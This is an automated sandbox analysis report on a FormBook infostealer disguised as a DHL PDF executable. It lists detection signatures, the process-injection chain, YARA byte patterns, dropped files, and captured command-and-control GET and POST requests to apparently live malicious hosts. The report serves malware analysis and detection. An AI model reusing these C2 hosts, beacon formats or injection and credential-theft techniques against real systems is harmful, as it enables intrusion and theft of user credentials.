
Analysis Report Dhl package - pdf.exe

Overview

General Information

Sample Name: Dhl package - pdf.exe
Analysis ID: 288188
MD5: 904fd496b076d10ab4fc547559b5d0b4
SHA1: b8e8a890eb523e786793e95a305d319632a60e87
SHA256: 3a10c525b2f0a94e7e9facfa4685490e9a46d0d6a62be53f570fa845cd680c56
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Hijacks the control flow in another process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Dhl package - pdf.exe (PID: 6924 cmdline: 'C:\Users\user\Desktop\Dhl package - pdf.exe' MD5: 904FD496B076D10AB4FC547559B5D0B4)
    • rundll32.exe (PID: 6952 cmdline: rundll32.exe Conservatory,Piggins MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 6964 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • wlanext.exe (PID: 2296 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
            • cmd.exe (PID: 6564 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18339:$sqlite3step: 68 34 1C 7B E1
  • 0x1844c:$sqlite3step: 68 34 1C 7B E1
  • 0x18368:$sqlite3text: 68 38 2A 90 C5
  • 0x1848d:$sqlite3text: 68 38 2A 90 C5
  • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.cmd.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.cmd.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.cmd.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17539:$sqlite3step: 68 34 1C 7B E1
  • 0x1764c:$sqlite3step: 68 34 1C 7B E1
  • 0x17568:$sqlite3text: 68 38 2A 90 C5
  • 0x1768d:$sqlite3text: 68 38 2A 90 C5
  • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
2.2.cmd.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.cmd.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further entry not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Conservatory.dll | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: Dhl package - pdf.exe | Virustotal: Detection: 29%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Dhl package - pdf.exe | Joe Sandbox ML: detected
Source: 2.2.cmd.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Dhl package - pdf.exe | Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\Dhl package - pdf.exe | Code function: 0_2_00406469 FindFirstFileA,FindClose, 0_2_00406469
Source: C:\Users\user\Desktop\Dhl package - pdf.exe | Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040592E
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop ebx, 2_2_00407B00
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop edi, 2_2_0040E42D
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop edi, 2_2_00417C93
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop ebx, 7_2_02607B00
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi, 7_2_0260E42D
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi, 7_2_02617C93
Source: global traffic | HTTP traffic detected:
  GET /c232/?FrJd4PG=/wtco9V96cseca29YfmdZFVvpGAwnPb4nFG7jo78XyJwvXxan3tUHSbMwxJfZ2HI11A9&UnPtj=7nY0BV7XFHAxNH4p HTTP/1.1
  Host: www.versabiosciences.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c232/?FrJd4PG=yAuS1K62+YG2JS31MbVnELpaeoYs0KO5NKhFlfoiJHnPyaL26l/nqb33liXaQFX1V46P&UnPtj=7nY0BV7XFHAxNH4p HTTP/1.1
  Host: www.orchidinvestmentlimited.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /c232/?FrJd4PG=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNXYx71ODcD/D&UnPtj=7nY0BV7XFHAxNH4p HTTP/1.1
  Host: www.3rdimultimedia.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 160.153.136.3
Source: Joe Sandbox View | IP Address: 198.54.117.211
Source: Joe Sandbox View | ASN Name: GODADDY-AMSDE
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: global traffic | HTTP traffic detected:
  POST /c232/ HTTP/1.1
  Host: www.orchidinvestmentlimited.com
  Connection: close
  Content-Length: 413
  Cache-Control: no-cache
  Origin: http://www.orchidinvestmentlimited.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.orchidinvestmentlimited.com/c232/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex dump of the encoded POST body omitted)
Source: global traffic | HTTP traffic detected:
  POST /c232/ HTTP/1.1
  Host: www.orchidinvestmentlimited.com
  Connection: close
  Content-Length: 148301
  Cache-Control: no-cache
  Origin: http://www.orchidinvestmentlimited.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.orchidinvestmentlimited.com/c232/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex dump of the encoded POST body omitted)
Source: global traffic | HTTP traffic detected:
  POST /c232/ HTTP/1.1
  Host: www.3rdimultimedia.com
  Connection: close
  Content-Length: 413
  Cache-Control: no-cache
  Origin: http://www.3rdimultimedia.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.3rdimultimedia.com/c232/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex dump of the encoded POST body omitted)
Source: global traffic | HTTP traffic detected:
  POST /c232/ HTTP/1.1
  Host: www.3rdimultimedia.com
  Connection: close
  Content-Length: 148301
  Cache-Control: no-cache
  Origin: http://www.3rdimultimedia.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.3rdimultimedia.com/c232/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex dump of the encoded POST body omitted)
Source: unknown | DNS traffic detected: queries for: www.versabiosciences.com
Source: unknown | HTTP traffic detected:
  POST /c232/ HTTP/1.1
  Host: www.orchidinvestmentlimited.com
  Connection: close
  Content-Length: 413
  Cache-Control: no-cache
  Origin: http://www.orchidinvestmentlimited.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.orchidinvestmentlimited.com/c232/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex dump of the encoded POST body omitted)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Mon, 21 Sep 2020 16:41:19 GMT
  Server: Apache
  X-Powered-By: PHP/7.2.33
  Vary: Accept-Encoding,Cookie
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Link: <https://orchidinvestmentlimited.com/wp-json/>; rel="https://api.w.org/"
  X-TEC-API-VERSION: v1
  X-TEC-API-ROOT: https://orchidinvestmentlimited.com/wp-json/tribe/events/v1/
  X-TEC-API-ORIGIN: https://orchidinvestmentlimited.com
  Connection: close
  Transfer-Encoding: chunked
  Content-Type: text/html; charset=UTF-8
  Data Raw: (hex dump of the chunked HTML 404 page omitted)
  Data Ascii: 4000<!doctype html><html lang="en-US"><head><meta charset="U
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: nsc735F.tmp.0.dr | String found in binary or memory: http://gimp-print.sourceforge.net/xsd/gp.xsd-1.0
Source: Dhl package - pdf.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Dhl package - pdf.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: nsc735F.tmp.0.dr | String found in binary or memory: http://postserv.post.gov.tw/webpost/CSController?cmd=POS4001_1
Source: nsc735F.tmp.0.dr | String found in binary or memory: http://postserv.post.gov.tw/webpost/CSController?cmd=POS4001_3&amp;MAILNO=
Source: nsc735F.tmp.0.dr | String found in binary or memory: http://search.msn.comXWarning:
Source: wlanext.exe, 00000007.00000002.439737077.00000000032E9000.00000004.00000001.sdmp | String found in binary or memory: http://www.3rdimultimedia.com
Source: wlanext.exe, 00000007.00000002.439737077.00000000032E9000.00000004.00000001.sdmp | String found in binary or memory: http://www.3rdimultimedia.com/c232/
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: org.gnome.Shell.Screenshot.xml.0.dr | String found in binary or memory: http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd
Source: nsc735F.tmp.0.dr | String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: nsc735F.tmp.0.dr | String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: yukon.xml.0.dr | String found in binary or memory: http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: nsc735F.tmp.0.drString found in binary or memory: https://www.amazon.co.uk/
          Source: nsc735F.tmp.0.drString found in binary or memory: https://www.amazon.co.uk/exec/obidos/external-search/
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053CB

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\97LP2175\97Llogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\97LP2175\97Llogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419C90 NtCreateFile,2_2_00419C90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419D40 NtReadFile,2_2_00419D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419DC0 NtClose,2_2_00419DC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419CE3 NtCreateFile,2_2_00419CE3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419C8B NtCreateFile,2_2_00419C8B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419DBA NtClose,2_2_00419DBA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9540 NtReadFile,LdrInitializeThunk,2_2_053B9540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B95D0 NtClose,LdrInitializeThunk,2_2_053B95D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9710 NtQueryInformationToken,LdrInitializeThunk,2_2_053B9710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_053B97A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9780 NtMapViewOfSection,LdrInitializeThunk,2_2_053B9780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_053B96E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_053B9910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B99A0 NtCreateSection,LdrInitializeThunk,2_2_053B99A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_053B9860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9840 NtDelayExecution,LdrInitializeThunk,2_2_053B9840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A20 NtResumeThread,LdrInitializeThunk,2_2_053B9A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A50 NtCreateFile,LdrInitializeThunk,2_2_053B9A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BAD30 NtSetContextThread,2_2_053BAD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9520 NtWaitForSingleObject,2_2_053B9520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9560 NtWriteFile,2_2_053B9560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B95F0 NtQueryInformationFile,2_2_053B95F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9730 NtQueryVirtualMemory,2_2_053B9730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BA710 NtOpenProcessToken,2_2_053BA710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9770 NtSetInformationFile,2_2_053B9770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BA770 NtOpenThread,2_2_053BA770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9760 NtOpenProcess,2_2_053B9760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9FE0 NtCreateMutant,2_2_053B9FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9610 NtEnumerateValueKey,2_2_053B9610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9670 NtQueryInformationProcess,2_2_053B9670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9660 NtAllocateVirtualMemory,2_2_053B9660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9650 NtQueryValueKey,2_2_053B9650
